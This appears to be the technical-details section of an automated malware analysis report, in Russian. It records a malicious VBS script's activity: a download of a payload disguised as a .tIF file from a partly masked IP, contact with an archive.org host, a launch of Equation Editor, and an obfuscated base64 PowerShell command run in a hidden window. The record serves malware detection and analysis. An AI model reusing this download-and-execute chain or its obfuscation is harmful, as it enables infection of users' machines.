Техническая информация
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\goodnewwithmegreatthingstob.vbS"
- %APPDATA%\goodnewwithmegreatthingstob.vbs
- '45.##6.253.157':80
- 'ia#####6.us.archive.org':443
- http://45.##6.253.157/50/goodnewwithmegreatthingstobe.tIF
- 'ia#####6.us.archive.org':443
- DNS ASK ia#####6.us.archive.org
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command $Codigo = 'J⤇ ⓔ ᭻ ㌴ ㋍Bp⤇ ⓔ ᭻ ㌴ ㋍G0⤇ ⓔ ᭻ ㌴ ㋍YQBn⤇ ⓔ ᭻ ㌴ ㋍GU⤇ ⓔ ᭻ ㌴ ㋍VQBy⤇ ⓔ ᭻ ㌴ ㋍Gw⤇ ⓔ ᭻ ㌴ ㋍I⤇ ⓔ ᭻ ㌴ ㋍⤇ ⓔ ᭻ ㌴ ㋍9⤇ ⓔ ᭻ ㌴ ㋍C⤇ ⓔ ᭻ ㌴ ㋍⤇ ⓔ ᭻ ㌴ ㋍JwBo⤇ ⓔ ᭻ ㌴ ㋍HQ⤇ ⓔ ᭻ ㌴ ㋍d⤇ ⓔ ᭻ ㌴ ㋍Bw⤇ ⓔ ᭻ ㌴ ㋍... (со скрытым окном)